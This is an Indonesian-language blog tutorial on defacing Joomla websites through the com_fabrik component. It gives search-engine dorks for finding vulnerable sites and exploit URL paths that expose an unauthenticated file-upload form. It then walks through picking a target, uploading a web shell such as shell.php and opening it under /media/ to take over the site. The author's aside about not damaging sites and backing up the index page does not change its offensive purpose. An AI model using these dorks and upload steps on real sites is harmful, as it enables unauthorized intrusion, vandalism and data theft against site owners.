-->
 ›   › 

Tutorial Deface Teknik CMS Joomla dengan Exploit Com_Fabrik

By ./Bazengers
di
1 comment
slamet sore guys...!! duh duh udah hampir seminggu nih kita gak bahas tentang deface baiklah kita asah lagi kemampuan deface kita, sebelum kita masuk ke tutorialnya apakah kalian sudah tahu apa itu deface? yah mungkin ada yang sudah tahu dan ada yang belum makanya ini saya kasih tahu terlebih dahulu apa itu deface ?

"Website defacement adalah serangan terhadap sebuah situs web yang mengubah tampilan visual dari situs atau halaman web. Ini biasanya merupakan pekerjaan dari para pembelot,
yang masuk ke server web dan mengganti situs web yang dihosting dengan salah satu dari mereka sendiri. Penangguhan pada umumnya dimaksudkan sebagai semacam grafiti elektronik dan,
seperti bentuk vandalisme lainnya, juga digunakan untuk menyebarkan pesan oleh "pemrotes" atau hacktivist"

jika sebelumnya kita telah mempelajari teknik - teknik dasar tentang cara deface untuk newbie baiklah ini sediit tambahan lagi untuk materinya yaitu Teknik Deface CMS Joomla dengan Exploit Com_Fabrik baiklah sepertinya bacotan saya sudah cukup panjang jadi kita mulai masuk ke tutorialnya

Baca Juga

Bahan - bahan :

Dork :

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com

Expoit :

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

atau

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher

Teknik Deface CMS Joomla dengan Exploit Com_Fabrik

1. pertama dorking dulu di search engine seperti biasanya
2. pilih salah satu target kalian, lalu langsung saja exploit
  contoh : www.target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. jika vuln maka akan muncul form upload seperti gambar di bawah. dan langsung saja kalian upload file atau shell kalian




4. selanjutnuya akses file atau shell agan : /media/namafileagan
  contoh : target.coli/media/shell.php



dan yuhuu... kita udah masuk ke database target, setelah itu terserah kalian dah mau dia apain mau di keruk - keruk terus sampai akar juga gak papa,
kalo saran saya sh liat - liat ajh yh jangan ngrusak, kalo mau tebas index yh di BACK UP DULLU..!! kasian tuh ngrancangscriptnya butuh waktu yang gak sdikit ampe ngrelain waktu sama istri :''D yah sepertinya kalian sudah paham dengan bacotan - bacotan bullshit saya ini yang kurang bermanfaat, kalo bisa sh semoga bermanfaat, jadi untuk postingan kali ini sampai di sini dulu untuk postingan yang lainya besok" ajh berhubung kopi dan rokoknya udah habis jadi saya akhiri saja dan sampai jumpa di postingan berikutnya.

image source : www.tkjcyberart.org/
Label:

Related Posts

1 comment

Post a Comment

Subscribe Our Newsletter
About Contact Disclaimer Privacy Policy Sitemap